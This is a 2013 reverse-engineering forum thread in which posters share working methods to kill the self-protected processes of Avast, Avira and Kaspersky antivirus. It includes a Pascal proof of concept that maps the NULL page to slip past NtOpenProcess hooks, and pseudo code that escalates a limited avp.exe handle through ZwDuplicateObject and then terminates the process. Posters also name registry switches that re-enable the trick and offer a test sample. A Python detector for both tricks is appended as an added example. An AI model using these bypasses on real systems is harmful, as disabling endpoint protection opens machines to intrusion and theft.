A forum for reverse engineering, OS internals and malware analysis 

Forum for discussion about user-mode development.
 #17571  by 0x16/7ton
 Thu Jan 03, 2013 8:07 pm
I want to share an interesting SP bypassing method in Avast and Avira, for the x86 architecture.
In both antiviruses SP is based on hooking the NtOpenProcess function in the SSDT, to prevent termination of the protected process.
For example Avast just returns STATUS_ACCESS_DENIED, while Avira changes the access mask of the opened process handle (read/query only) when we try to open the protected process.
At the start of the hook handler function they all check the input parameters of NtOpenProcess.
Here is its definition:
Code:
NTSTATUS NtOpenProcess
(
  _Out_     PHANDLE ProcessHandle,
  _In_      ACCESS_MASK DesiredAccess,
  _In_      POBJECT_ATTRIBUTES ObjectAttributes,
  _In_opt_  PCLIENT_ID ClientId
)
So I use a trick to fool the AV:
ProcessHandle and ObjectAttributes can be NULL pointers ;) Yes, I mean that Windows allows those parameters to be NULL and does not fail if we allocate memory with READ/WRITE access in the NULL region.
As a result the AV checks are not executed (they think the incoming parameters are not correct), and control flow is only passed to the original function.
OK, here is the demo video:
http://www.sendspace.com/file/bibrzz
Have Fuuun and also my regards ;)
 #17585  by EP_X0FF
 Fri Jan 04, 2013 10:56 am
Good old trick with a null pointer. Didn't think this would still work on someone. Won't work in Win8.

If anyone is interested, here is the old Pascal source. Only the Avira detect+kill code is missing.
Code:
var
  Status: NTSTATUS;
  addr: pointer;
  size: ULONG;
  cid: CLIENT_ID;
  attr: OBJECT_ATTRIBUTES;
begin
  { map the NULL page: base $1 is rounded down to 0 }
  addr := pointer($1);
  size := $1000;

  Status := ZwAllocateVirtualMemory(NtCurrentProcess, @addr, 0, @size, MEM_RESERVE or MEM_COMMIT, PAGE_READWRITE);
  if (Status = STATUS_SUCCESS) then
  begin

    InitializeObjectAttributes(@attr, nil, 0, 0);
    cid.UniqueProcess := GetCurrentProcessId();

    { ProcessHandle and ObjectAttributes passed as nil; the handle lands at address 0 }
    Status := ZwOpenProcess(nil, PROCESS_ALL_ACCESS, nil, @cid);
    if (Status = STATUS_SUCCESS) then
    begin
      ZwClose(PHANDLE(nil)^);
      MessageBoxW(0, 'Success', '', MB_OK);
    end;
    ZwFreeVirtualMemory(NtCurrentProcess, @addr, @size, MEM_RELEASE);
  end else
    MessageBoxW(0, 'ZWAVM fail', '', MB_OK);
end;
List of Avira 13 hooks.
NtClose
NtCreateKey
NtCreateSection
NtCreateThread
NtDeleteKey
NtDeleteValueKey
NtDuplicateObject
NtLoadKey
NtOpenProcess
NtOpenThread
NtQueryValueKey
NtReplaceKey
NtRequestWaitReplyPort
NtRestoreKey
NtSetContextThread
NtSetSecurityObject
NtSetValueKey
NtSystemDebugControl
NtTerminateProcess
Pretty banal, multiple ways to terminate using a valid full-access process handle.
 #18884  by rinn
 Wed Apr 10, 2013 3:11 am
Hello.

Bumping the old thread to add: the trick using memory allocated at the NULL VA should not work after MS13-031 :)

Best Regards,
-rin
 #18885  by EP_X0FF
 Wed Apr 10, 2013 6:30 am
rinn wrote:Bumping the old thread to add: the trick using memory allocated at the NULL VA should not work after MS13-031 :)
It will still work in XP, as no one is interested/motivated in an XP redesign.
 #18887  by rinn
 Wed Apr 10, 2013 7:13 am
EP_X0FF wrote:
rinn wrote:Bumping the old thread to add: the trick using memory allocated at the NULL VA should not work after MS13-031 :)
It will still work in XP, as no one is interested/motivated in an XP redesign.
Hi.

Yes, true for 32-bit versions of Windows, because of NTVDM.

Best Regards,
-rin
 #18895  by 0x16/7ton
 Wed Apr 10, 2013 9:26 am
Yeap patch :)
This man @Ivanlef0u (on Twitter) found this:
On Windows 7 x86 the NULL page can still be mapped because the global var nt!MmLowVaMapping is 1.
Also we can control this global parameter:
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management
EnableLowVaAccess
And this:
Image File Execution Options [EnableLowVaAccess]
Hehe, and in the end it is not a problem to use another well-known method, for example passing the function parameters in memory with the PAGE_GUARD attribute set.
 #18896  by EP_X0FF
 Wed Apr 10, 2013 9:53 am
0x16/7ton wrote: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management
EnableLowVaAccess
And this:
Image File Execution Options [EnableLowVaAccess]
Without admin rights you cannot change it.
Hehe, and in the end it is not a problem to use another well-known method, for example passing the function parameters in memory with the PAGE_GUARD attribute set.
Does it still work with something? I know Comodo was vulnerable to this.
 #18897  by 0x16/7ton
 Wed Apr 10, 2013 10:03 am
I did not try on other vendors, but I think some of them will be fooled.
Anyway, on x64 systems HIPS is totally weird shit and we don't need to use any tricks :D
 #19256  by 0x16/7ton
 Sat May 11, 2013 12:01 pm
pikA kernelMode :)
Today I am gonna show another simple trick to fool AV.
OK, victim == Kaspersky 2013 with all latest updates (yeap really, I have a licensed version :D)

So as we already discussed, the SP of all AVs is based on prohibiting opening of the protected process.
But of course, to provide some compatibility, they allow opening their process with some limited access.
OK, example:
Kaspersky allows opening its main process (avp.exe) with the PROCESS_QUERY_LIMITED_INFORMATION access mask.
And here is the simple trick:
We use the ZwDuplicateObject function to duplicate the handle of the opened process, but with a different ACCESS_MASK (DesiredAccess).
Code:
NTSTATUS ZwDuplicateObject(
  _In_       HANDLE SourceProcessHandle,
  _In_       HANDLE SourceHandle,
  _In_opt_   HANDLE TargetProcessHandle,
  _Out_opt_  PHANDLE TargetHandle,
  _In_       ACCESS_MASK DesiredAccess,
  _In_       ULONG HandleAttributes,
  _In_       ULONG Options
);
Simple pseudo code:
Code:
//opening avp.exe
hProcess=OpenProcess( PROCESS_QUERY_LIMITED_INFORMATION);
//duplicate new handle with full access
ZwDuplicateObject((HANDLE)CURRENT_PROCESS,hProcess,(HANDLE)CURRENT_PROCESS,&new_handle,PROCESS_ALL_ACCESS,DUPLICATE_SAME_ATTRIBUTES);
As a result we have a full-access process handle. So what can we do? For example, I use this well-known method to force the process to terminate:
Code:
for (i = 0 ; i <= 4096 ; i++)
{
     HANDLE copy_handle;
     DuplicateHandle( new_handle, (HANDLE)i , NULL, &copy_handle, 0, FALSE, DUPLICATE_CLOSE_SOURCE);
}
I can't test now with other AVs and on other Windows versions (I am testing on Vista SP1 x86).
Also I did not make a video demo, but I attach a test sample, so if you want to try it, you are welcome :)
Notes:
- in the attached sample only the GUI process avp.exe is terminated
- to terminate the service I think we need admin rights and to impersonate a thread with the SYSTEM SID token (S-1-5-18), otherwise ZwDuplicateObject returns STATUS_ACCESS_DENIED
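From a defender's side, both bypasses in this thread (the NULL ProcessHandle/ObjectAttributes trick in #17571 and the handle-rights escalation through ZwDuplicateObject in #19256) are visible as anomalies in a syscall trace. The following is an added example, not code from the thread or from any vendor: a small Python check over constructed trace records that flags a protected process being opened with NULL out-pointers, and a handle duplication that asks for rights the source handle never had. The event format, the `PROTECTED` set and the sample records are assumptions for the example.

```python
# Added example: detection over constructed syscall-trace records.
# Access-mask values are the documented Windows PROCESS_* constants.
PROCESS_TERMINATE = 0x0001
PROCESS_VM_WRITE = 0x0020
PROCESS_DUP_HANDLE = 0x0040
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
PROCESS_ALL_ACCESS = 0x1FFFFF  # Vista+ value, matching the x86 targets in the thread
# Rights whose unexpected appearance on a protected-process handle matters most.
DANGEROUS = PROCESS_TERMINATE | PROCESS_VM_WRITE | PROCESS_DUP_HANDLE

PROTECTED = {"avp.exe"}  # constructed: image names the self-protection covers


def analyze(events):
    """Return [(event_index, reason)] for records that look like a bypass attempt.

    Each event is a dict: 'api' ('NtOpenProcess' | 'NtDuplicateObject'),
    'target' (image name of the referenced process), 'access' (DesiredAccess),
    'granted' (rights of the source handle; duplications only),
    'null_args' (True if ProcessHandle/ObjectAttributes were NULL; opens only).
    """
    findings = []
    for i, ev in enumerate(events):
        if ev["target"] not in PROTECTED:
            continue
        if ev["api"] == "NtOpenProcess" and ev.get("null_args"):
            # #17571: the kernel accepts NULL out-pointers once the null page is
            # mapped, so a hook must validate them rather than skip its check.
            findings.append((i, "NtOpenProcess with NULL ProcessHandle/ObjectAttributes"))
        elif ev["api"] == "NtDuplicateObject":
            # #19256: rights requested that the source handle does not carry.
            escalated = ev["access"] & ~ev["granted"]
            if escalated & DANGEROUS:
                findings.append((i, f"handle rights escalated by 0x{escalated:x}"))
    return findings


# Constructed sample trace: a limited open, the escalating duplicate,
# a NULL-pointer open, an unrelated process, and a benign same-rights duplicate.
SAMPLE_EVENTS = [
    {"api": "NtOpenProcess", "target": "avp.exe", "access": PROCESS_QUERY_LIMITED_INFORMATION, "null_args": False},
    {"api": "NtDuplicateObject", "target": "avp.exe", "access": PROCESS_ALL_ACCESS, "granted": PROCESS_QUERY_LIMITED_INFORMATION},
    {"api": "NtOpenProcess", "target": "avp.exe", "access": PROCESS_ALL_ACCESS, "null_args": True},
    {"api": "NtDuplicateObject", "target": "notepad.exe", "access": PROCESS_ALL_ACCESS, "granted": 0},
    {"api": "NtDuplicateObject", "target": "avp.exe", "access": PROCESS_QUERY_LIMITED_INFORMATION, "granted": PROCESS_QUERY_LIMITED_INFORMATION},
]

if __name__ == "__main__":
    for idx, reason in analyze(SAMPLE_EVENTS):
        print(f"event {idx}: {reason}")
```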